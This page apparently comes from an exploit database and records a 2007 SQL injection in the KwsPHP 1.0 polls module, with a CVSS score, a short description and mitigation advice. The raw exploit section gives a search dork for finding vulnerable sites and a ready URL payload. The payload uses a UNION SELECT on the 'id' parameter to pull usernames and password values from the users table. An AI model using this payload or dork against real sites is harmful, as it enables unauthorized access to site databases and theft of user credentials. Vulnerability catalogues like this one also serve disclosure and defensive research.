KwsPHP 1.0 sondages Module Remote SQL Injection Exploit

vendor:

KwsPHP

by:

H-T Team (HouSSamix _ ToXiC350)

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: KwsPHP

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

KwsPHP 1.0 sondages Module Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on the KwsPHP 1.0 sondages module. By manipulating the 'id' parameter in the URL, an attacker can retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users can mitigate the risk by validating and sanitizing user input before executing any SQL queries.

Source

Exploit-DB raw data:

#########################################################################
    KwsPHP 1.0 sondages Module Remote SQL Injection Exploit
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site: http://kws.koogar.org/
## Dork : inurl:index.php?mod=sondages


## EXPLOITS :

http://server.com/Path/index.php?mod=sondages&do=results&id=-1%20union%20select%201,2,3,concat(pseudo,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20where%20id=1--



## GREETZ  : All members no-hack

#########################################################################
         KwsPHP 1.0 sondages Module Remote SQL Injection Exploit
######################################################################### 

# milw0rm.com [2007-09-18]